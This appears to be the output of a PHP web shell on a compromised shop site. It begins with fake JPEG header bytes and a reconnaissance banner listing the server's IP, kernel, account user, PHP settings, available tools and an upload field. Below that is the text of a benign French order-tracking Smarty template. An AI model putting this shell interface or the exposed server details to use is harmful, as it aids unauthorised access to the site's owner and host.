ÿØÿà JFIF ` ` ÿþxØ
| Server IP : 109.234.164.53 / Your IP : 216.73.216.110 Web Server : Apache System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : computer3 ( 1098) PHP Version : 7.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/computer3/litsolide.com/templates/shop/ |
Upload File : |
{include file="header.tpl"}
<div class="container">
<div class="row">
<div class="{$type_anima}">
{include file="centre.tpl"}
</div>
<div class="{$type_anima}">
{include file="left.tpl"}
</div>
<div class="span8C">
<!-- Titre de la page -->
<div class="title_cat">
<h3>Suivi de la commande {$order.id_order} - {$order.id}</h1>
</div>
<!-- Contenu de la page -->
<div class="thumbnail">
<div class="caption">
<table class="table table-striped table-bordered">
<thead>
<tr>
<th style="border-bottom:0">Date</th>
<th style="border-bottom:0">Statut</th>
</tr>
</thead>
<tbody>
{foreach $order_status as $orderStatus}
<tr>
<td>{$orderStatus.date_status|date_format:"%d/%m/%Y %Hh%M"}</td>
<td>
{if $orderStatus.status == 1}
{$comm_1}
{elseif $orderStatus.status == 2}
{$comm_2}
{elseif $orderStatus.status == 3}
{$comm_3}
{else}
{$comm_4}
{/if}
</td>
</tr>
{/foreach}
</tbody>
</table>
<br /><br /><center>Si vous désirez plus d'information sur votre commande, utilisez notre formulaire de contact.</center>
</div>
</div>
</div>
{include file="right.tpl"}
</div>
</div>
{include file="footer.tpl"}